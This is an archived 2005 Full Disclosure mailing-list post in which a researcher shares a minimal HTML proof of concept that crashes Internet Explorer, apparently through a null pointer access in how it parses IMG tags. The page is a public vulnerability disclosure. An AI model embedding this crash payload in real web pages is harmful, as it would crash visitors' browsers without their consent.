Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

fulldisclosure logo Full Disclosure mailing list archives

Re: new IE bug (confirmed on ALL windows)
From: Petko Petkov <ppetkov () gnucitizen org>
Date: Tue, 01 Nov 2005 17:32:01 +0000
This is a mini version of IECrash:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd";>
<STYLE>
.supp IMG {
VERTICAL-ALIGN: middle
}
</STYLE>
<P><A <It>HELLO WORLD!</P>
<DIV class=supp>
<A><IMG>

If you remove the DOCTYPE IE does not crash. I believe that this is some
sort of parsing vulnerability and directly affects IMG tags.

Peter Ferrie wrote:


I think I have found by chance this weekend a security bug,while browsing
   


the website news, within iexplorer on all windows versions.
 


I haven't enough knowledge (and don't want) into web browsers security to
   


conduct a full investigation, at least

It's a null pointer access, but it's not clear for me, yet, why it occurs.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]